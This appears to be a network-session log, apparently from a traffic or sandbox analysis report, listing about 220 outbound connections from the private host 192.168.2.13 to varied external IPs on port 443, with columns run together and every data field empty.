                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24586192.168.2.1342722191.163.176.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24587192.168.2.134581254.157.107.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24588192.168.2.1348822126.237.43.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24589192.168.2.1334594166.123.223.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24590192.168.2.1341382197.12.181.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24591192.168.2.134891865.21.91.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24592192.168.2.133336841.236.180.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24593192.168.2.1357930211.222.207.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24594192.168.2.13498164.103.254.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24595192.168.2.1359120148.225.59.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24596192.168.2.133521631.222.157.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24597192.168.2.135063894.46.43.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24598192.168.2.134800019.94.205.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24599192.168.2.135061854.146.36.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24600192.168.2.135488443.54.79.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24601192.168.2.135029852.101.221.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24602192.168.2.1344590151.49.229.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24603192.168.2.133659024.154.194.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24604192.168.2.1337726158.158.1.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24605192.168.2.1346070184.167.202.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24606192.168.2.133883875.91.138.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24607192.168.2.1343262191.1.159.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24608192.168.2.136006062.254.190.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24609192.168.2.1341862173.211.32.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24610192.168.2.136078465.242.111.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24611192.168.2.134989480.101.194.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24612192.168.2.1352158147.222.242.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24613192.168.2.133373825.165.249.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24614192.168.2.1341022143.95.82.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24615192.168.2.1335716213.80.153.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24616192.168.2.133293857.119.47.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24617192.168.2.134316464.69.184.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24618192.168.2.1338442113.51.207.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24619192.168.2.1340118106.194.181.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24620192.168.2.1333172123.49.206.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24621192.168.2.134346271.160.139.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24622192.168.2.1359020211.110.183.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24623192.168.2.133848043.45.211.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24624192.168.2.133812827.192.246.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24625192.168.2.134828460.64.185.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24626192.168.2.1335336202.2.14.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24627192.168.2.135614693.221.47.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24628192.168.2.136033254.255.204.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24629192.168.2.1352286165.72.92.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24630192.168.2.1349872129.74.234.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24631192.168.2.134420025.224.14.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24632192.168.2.13332421.80.96.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24633192.168.2.135960871.138.223.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24634192.168.2.135666883.37.61.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24635192.168.2.133821244.42.116.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24636192.168.2.1347664208.246.184.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24637192.168.2.1336272180.121.28.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24638192.168.2.136067885.19.82.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24639192.168.2.1357388156.111.147.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24640192.168.2.1350952132.223.195.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24641192.168.2.1347204205.167.178.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24642192.168.2.1343384194.127.187.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24643192.168.2.1348998139.2.232.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24644192.168.2.13478109.86.126.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24645192.168.2.1338266181.121.244.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24646192.168.2.133983066.220.37.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24647192.168.2.135331495.180.17.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24648192.168.2.1355256217.144.25.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24649192.168.2.133540634.64.182.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24650192.168.2.134545261.234.105.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24651192.168.2.134146624.186.164.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24652192.168.2.1349822122.36.197.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24653192.168.2.134044431.17.67.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24654192.168.2.1334874179.161.253.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24655192.168.2.133681047.96.221.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24656192.168.2.1340450154.36.80.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24657192.168.2.1333426138.229.84.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24658192.168.2.1353524128.194.12.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24659192.168.2.133884451.17.221.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24660192.168.2.1354976159.92.23.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24661192.168.2.135014424.127.122.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24662192.168.2.1352272190.17.126.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24663192.168.2.1346608143.36.111.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24664192.168.2.135101238.235.167.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24665192.168.2.1359592177.111.239.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24666192.168.2.135991084.97.215.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24667192.168.2.1358474130.69.99.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24668192.168.2.134486417.89.217.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24669192.168.2.1352568176.80.47.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24670192.168.2.1359356150.195.12.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24671192.168.2.133581063.24.29.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24672192.168.2.1343592169.109.131.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24673192.168.2.1350626105.2.146.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24674192.168.2.13427809.228.7.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24675192.168.2.135557680.186.10.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24676192.168.2.1357464212.27.103.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24677192.168.2.1348032133.24.170.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24678192.168.2.134807885.170.223.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24679192.168.2.1341816158.193.75.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24680192.168.2.133758093.166.104.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24681192.168.2.133546825.48.111.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24682192.168.2.1338618144.17.152.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24683192.168.2.1349142109.47.131.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24684192.168.2.135197064.26.0.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24685192.168.2.134680873.93.180.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24686192.168.2.1341322116.152.124.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24687192.168.2.1355894194.139.145.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24688192.168.2.135904235.56.186.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24689192.168.2.13377942.223.3.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24690192.168.2.134439652.179.129.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24691192.168.2.1350494125.153.137.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24692192.168.2.1344322209.138.1.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24693192.168.2.133335895.100.0.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24694192.168.2.134156037.101.51.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24695192.168.2.1341912126.199.206.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24696192.168.2.1346908132.88.13.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24697192.168.2.1355130179.159.131.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24698192.168.2.1335354148.194.32.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24699192.168.2.133998045.255.105.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24700192.168.2.1335224165.158.238.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24701192.168.2.1351852105.148.156.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24702192.168.2.1354554194.118.105.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24703192.168.2.1336598129.240.17.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24704192.168.2.1346196103.91.107.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24705192.168.2.1352074177.74.27.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24706192.168.2.134184266.3.248.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24707192.168.2.1352316109.68.1.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24708192.168.2.1345332137.205.148.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24709192.168.2.1343136108.215.161.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24710192.168.2.1351606124.108.104.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24711192.168.2.134413649.210.22.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24712192.168.2.1357468104.26.212.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24713192.168.2.1351694187.152.30.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24714192.168.2.1357414183.127.61.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24715192.168.2.1359066198.210.114.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24716192.168.2.135959862.241.28.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24717192.168.2.133722017.243.184.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24718192.168.2.13440869.173.237.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24719192.168.2.1335330187.26.144.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24720192.168.2.1347144121.104.74.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24721192.168.2.135935435.154.82.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24722192.168.2.134221024.113.151.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24723192.168.2.1360918150.46.250.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24724192.168.2.1338490222.188.5.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24725192.168.2.1333254217.11.14.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24726192.168.2.136039243.200.1.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24727192.168.2.1339340102.118.2.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24728192.168.2.13345422.232.105.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24729192.168.2.135396475.204.173.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24730192.168.2.1334198204.124.54.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24731192.168.2.134873883.234.91.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24732192.168.2.1339914202.50.60.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24733192.168.2.135689461.245.114.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24734192.168.2.134057423.253.158.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24735192.168.2.1351432184.165.207.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24736192.168.2.1339462101.154.18.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24737192.168.2.1334944121.150.244.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24738192.168.2.134264234.66.56.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24739192.168.2.135680642.205.145.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24740192.168.2.133492497.42.149.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24741192.168.2.1345314182.41.16.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24742192.168.2.1352174187.131.177.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24743192.168.2.133746293.236.224.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24744192.168.2.1352434188.176.132.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24745192.168.2.1341058167.218.52.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24746192.168.2.1352354102.163.19.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24747192.168.2.1341398120.96.162.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24748192.168.2.133870645.165.242.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24749192.168.2.1354708205.226.202.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24750192.168.2.135959620.70.62.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24751192.168.2.1333596208.101.72.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24752192.168.2.135340436.25.146.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24753192.168.2.134136869.152.157.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24754192.168.2.1337424110.79.137.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24755192.168.2.1358972200.137.182.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24756192.168.2.134480020.189.129.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24757192.168.2.133966612.68.177.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24758192.168.2.1339630195.139.62.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24759192.168.2.134231846.155.199.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24760192.168.2.1348924135.34.174.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24761192.168.2.136015068.235.2.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24762192.168.2.1335434126.254.177.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24763192.168.2.1346262218.157.44.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24764192.168.2.1342074180.4.125.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24765192.168.2.1334052126.104.65.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24766192.168.2.1350864162.90.74.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24767192.168.2.1338178162.35.233.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24768192.168.2.133956858.40.248.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24769192.168.2.1333472153.78.194.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24770192.168.2.135380291.96.25.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24771192.168.2.134891034.161.119.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24772192.168.2.1333790203.62.147.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24773192.168.2.135711258.157.32.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24774192.168.2.133864619.106.110.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24775192.168.2.1355464141.12.227.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24776192.168.2.1347806107.71.39.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24777192.168.2.1346554144.209.2.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24778192.168.2.136079685.163.151.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24779192.168.2.134643457.168.169.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24780192.168.2.1341934201.128.186.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24781192.168.2.1342526132.5.17.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24782192.168.2.1336526208.140.6.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24783192.168.2.136060247.120.148.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24784192.168.2.1356452121.172.206.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24785192.168.2.134334680.227.108.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24786192.168.2.133354249.73.229.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24787192.168.2.1349550151.159.156.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24788192.168.2.135058441.130.79.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24789192.168.2.1340080124.139.48.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24790192.168.2.133426685.143.81.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24791192.168.2.1333068191.203.192.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24792192.168.2.134230864.234.46.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24793192.168.2.1359654149.29.74.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24794192.168.2.1352336216.201.159.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24795192.168.2.1338192103.102.212.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24796192.168.2.1359538146.191.84.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24797192.168.2.135738645.15.69.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24798192.168.2.1359356181.11.66.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24799192.168.2.136001462.71.40.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24800192.168.2.13472004.67.192.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24801192.168.2.135173627.153.55.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24802192.168.2.134152465.106.144.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24803192.168.2.133929461.158.70.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24804192.168.2.1358504162.85.113.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24805192.168.2.1348350167.252.158.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24806192.168.2.134315036.116.120.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24807192.168.2.1339688199.36.30.13443
                                        TimestampBytes transferredDirectionData


